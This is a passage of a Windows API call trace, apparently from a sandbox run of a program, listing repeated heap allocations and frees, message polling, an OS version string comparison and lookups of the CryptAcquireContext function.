Size=0x1) returned 0x2e54ca8 [0226.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.061] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0226.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0226.061] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0226.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.061] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0226.062] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.062] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.062] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.062] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0226.063] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.063] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.063] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0226.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0226.064] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0226.066] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cf8 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.066] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0226.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0226.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0226.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0226.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0226.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0226.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0226.072] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0226.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0226.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0226.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0226.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0226.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0226.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a48 [0226.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0226.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0226.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0226.073] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0226.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0226.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0226.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 